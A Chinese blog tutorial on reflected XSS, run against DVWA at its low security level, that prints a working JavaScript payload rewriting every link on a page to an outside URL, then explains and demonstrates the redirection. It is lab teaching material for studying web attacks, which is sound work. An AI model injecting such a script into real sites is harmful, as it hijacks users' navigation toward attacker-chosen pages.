XSS漏洞-XSS攻击实例(八)

2022年8月15日17:00:21 发表评论 257 views

1.1 反射型XSS攻击劫持用户浏览器

1.1.1 构造攻击payload

<script>
window.onload = function() {
var link= document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href= "https://blog.leonshadow.cn";
}
}
</script>

payload说明:

  • JavaScript代码分析onload当网页加载完成时,执行function匿名函数:
  • 函数功能: document.getElementsByTagName获取页面中所有的a标签,存放到link数组中,使用for循环将link数组中的所有元素替换为恶意网址。

1.1.2 执行payload

1.1.2.1  DVWA安全级别设为low

1.1.2.2  执行攻击代码

XSS漏洞-XSS攻击实例(八)

1.1.3 查看攻击效果

执行完成后页面并没有什么异常,刷新也没有问题,但是我们点击页面中任何链接时会发现所有能够点击的链接点击后都会跳转到https://blog.leonshadow.cn

XSS漏洞-XSS攻击实例(八)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang